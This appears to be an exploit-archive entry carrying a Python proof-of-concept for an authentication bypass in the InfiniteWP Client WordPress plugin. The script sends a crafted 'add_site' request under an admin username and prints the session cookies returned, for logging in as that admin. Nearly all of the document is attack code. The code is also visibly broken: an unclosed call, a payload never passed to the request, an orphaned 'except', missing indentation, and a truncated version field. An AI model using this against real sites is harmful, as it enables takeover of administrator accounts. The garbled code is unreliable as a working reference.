WordPress InfiniteWP Client Authentication Bypass

WordPress InfiniteWP Client plugin version suffers from an authentication bypass vulnerability.

MD5 | e590e4be1178b86402299bf3161677cb

# Exploit Title: Wordpress Plugin InfiniteWP Client - Authentication Bypass
# Date: 2020-1-16
# Exploit Author: Raphael Karger
# Vendor Homepage: https://infinitewp.com/
# Version: InfiniteWP Client <


import requests
import json
import argparse
import base64
import json
import urllib3

def exploit(site, username):
json_info = {"iwp_action":"add_site","params":{"username": username}}
return requests.post(site, timeout=5, verify=False,
headers={"User-Agent" : "raphaelrocks"},
except Exception as e:
print("[-] HTTP Exploit Error: {}".format(e))
return False

if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("-n", "--username", dest="username", help="Username of admin, default is admin", default="admin")
parser.add_argument("-u", "--url", dest="url", help="Root URL of Site")
args = parser.parse_args()
site_exploit = exploit(args.url, args.username)
if site_exploit and site_exploit.status_code == requests.codes.ok:
cookie_string = "; ".join([str(x)+"="+str(y) for x,y in site_exploit.cookies.items()])
if cookie_string:
print("[+] Use Cookies to Login: \n{}".format(cookie_string))
print("[-] Exploit Failed")

Related Posts